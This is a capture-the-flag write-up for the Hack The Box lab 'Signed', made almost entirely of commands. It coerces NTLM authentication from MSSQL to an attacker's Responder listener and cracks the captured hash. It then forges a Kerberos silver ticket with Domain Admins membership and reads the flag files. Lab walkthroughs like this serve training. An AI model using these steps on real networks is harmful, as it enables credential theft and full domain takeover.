HTB: Signed—Write-Up
Author: Azrael aka Marxist Hoodlum - Difficulty: Medium Vector: MSSQL → NTLM Leak → Hashcat → Kerberos Silver Ticket → Domain Admin
Recon
nmap -sV -sC -p- 10.10.11.90 Initial Access
impacket-mssqlclient scott:Sm230#C5NatH@yourtargertIPCapture NTLM via MSSQL Outbound Authentication
Start a Responder in another terminal.
sudo responder -I tun0 Go back to where you logged in as scott and use YOUR ip to share the hash.
EXEC xp_dirtree ‘\\\\yourip\\share’;or if that doesn’t work, try:
EXEC master..xp_fileexist ‘\\\\yourip\\share\\test’;If the process is successful, you should see the following output in your other terminal where Responder is running:
SMB NTLMv2 Client: 10.10.X.X
NTLMv2 Hash Captured...Crack Hash
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt Recovered Password: purPLE9795!@
Log in as Service Account
impacket-mssqlclient mssqlsvc:'purPLE9795!@'@targetIP -windows-auth Verify Privileges
SELECT IS_SRVROLEMEMBER('sysadmin'); Extract NT Hash
echo -n 'purPLE9795!@' | iconv -f UTF-8 -t UTF-16LE | openssl dgst -md4 # ef699384c3285c54128a3ee1ddb1a0cc
Create Silver Ticket
impacket-ticketer \
-nthash ef699384c3285c54128a3ee1ddb1a0cc \
-domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
-domain SIGNED.HTB \
-spn MSSQLSvc/DC01.SIGNED.HTB \
-groups 512,1105 \
-user-id 1103 \
mssqlsvcLoad & Re-Auth
In the same terminal you created the ticketer export it.
export KRB5CCNAME="$(pwd)/mssqlsvc.ccache" impacket-mssqlclient -k 'SIGNED.HTB/mssqlsvc@dc01.signed.htb' -windows-auth -no-pass Log in ^.
Now you should be sysadmin and get both the user.txt and root.txt flags:
User
SELECT * FROM OPENROWSET(BULK N’C:\Users\mssqlsvc\Desktop\user.txt’, SINGLE_CLOB) AS t;If that does not work, then use this command:
SELECT BulkColumn FROM OPENROWSET(BULK ‘C:\Users\mssqlsvc\Desktop\user.txt’, SINGLE_CLOB) AS t;Root
SELECT * FROM OPENROWSET(BULK N'C:\Users\Administrator\Desktop\root.txt', SINGLE_CLOB) AS t;